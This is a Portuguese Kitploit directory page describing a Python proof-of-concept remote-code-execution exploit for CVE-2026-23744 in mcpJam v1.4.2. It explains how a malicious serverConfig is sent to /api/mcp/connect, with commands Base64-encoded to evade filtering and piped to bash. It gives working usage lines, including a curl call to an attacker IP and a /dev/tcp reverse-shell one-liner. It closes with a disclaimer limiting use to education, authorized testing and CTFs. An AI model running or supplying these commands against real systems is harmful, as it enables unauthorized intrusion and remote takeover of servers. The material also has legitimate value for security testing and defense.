Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-23744-poc — cve-2026-23744 exploit em Python | Kitploit
Ferramentas/GitHubGitHub/keeieb79/cve-2026-23744-poc
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubkeeieb79/cve-2026-23744-poc

CVE-2026-23744-poc

cve-2026-23744 exploit em Python

Ver Repositório
2há 3 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-23744 — Exploit de Execução Remota de Código (RCE) para mcpJam

Um exploit de prova de conceito em Python 3 para CVE-2026-23744, uma vulnerabilidade de execução arbitrária de comandos que afeta mcpJam v1.4.2.

Esta utilidade automatiza a entrega do payload codificando transparentemente os comandos em Base64 antes da transmissão, ajudando a contornar validações restritivas de entrada e mecanismos de filtragem de caracteres. O payload é decodificado e executado através de um wrapper /bin/bash no sistema alvo.


Funcionalidades

Codificação Automática de Payload em Base64

Os comandos são automaticamente codificados antes da transmissão, melhorando a confiabilidade ao atacar aplicações que impõem validação rigorosa de entrada ou restrições de caracteres.

Execução Flexível de Comandos

Suporta execução arbitrária de comandos, incluindo:

  • Shells reversos (sh, bash, nc, etc.)
Baixar ferramenta
  • Enumeração do sistema
  • Teste de conectividade de rede
  • Entrega de payload personalizada
  • Saída de Depuração Detalhada

    Exibe:

    • Payloads de requisição JSON gerados
    • Respostas brutas do servidor

    Isso simplifica a solução de problemas e a validação do exploit.

    Desvio de Verificação SSL

    Suprime avisos de verificação de certificado, permitindo interação com alvos que utilizam certificados SSL autoassinados ou não confiáveis.


    Uso

    Pré-requisitos

    Instale a dependência necessária:

    root@kitploit:~
    pip install requests
    

    Sintaxe

    root@kitploit:~
    python3 exploit.py <url_alvo> "<comando>"
    

    Exemplos

    Teste de Conectividade

    root@kitploit:~
    python3 exploit.py http://devhub.com:6274 "curl http://10.10.14.70:8888"
    

    Shell Reverso

    root@kitploit:~
    python3 exploit.py http://devhub.com:6274 "sh -i >& /dev/tcp/10.10.14.70/4444 0>&1"
    

    Detalhes Técnicos

    O exploit visa o endpoint /api/mcp/connect criando um objeto serverConfig malicioso.

    Em vez de transmitir comandos diretamente, o payload é transformado em uma string codificada em Base64 e executado através do Bash:

    root@kitploit:~
    "args": [
        "-c",
        f"echo {base64_payload} | base64 -d | bash"
    ]
    

    Essa abordagem ajuda a evadir a filtragem no nível da aplicação, garantindo que o payload seja decodificado e executado inteiramente no host alvo.

    Fluxo de Execução

    1. O comando fornecido pelo usuário é codificado em Base64.
    2. O payload codificado é incorporado na requisição serverConfig.
    3. O servidor alvo decodifica o payload usando base64 -d.
    4. O comando decodificado é redirecionado diretamente para /bin/bash.
    5. O comando é executado com os privilégios do processo mcpJam vulnerável.

    Aviso Legal

    [!WARNING] Este projeto é fornecido exclusivamente para fins educacionais, avaliações de segurança autorizadas e ambientes Capture The Flag (CTF).

    O uso não autorizado contra sistemas para os quais você não possui permissão explícita é ilegal e antiético. O autor não assume nenhuma responsabilidade por qualquer uso indevido, danos ou consequências legais decorrentes do uso deste software.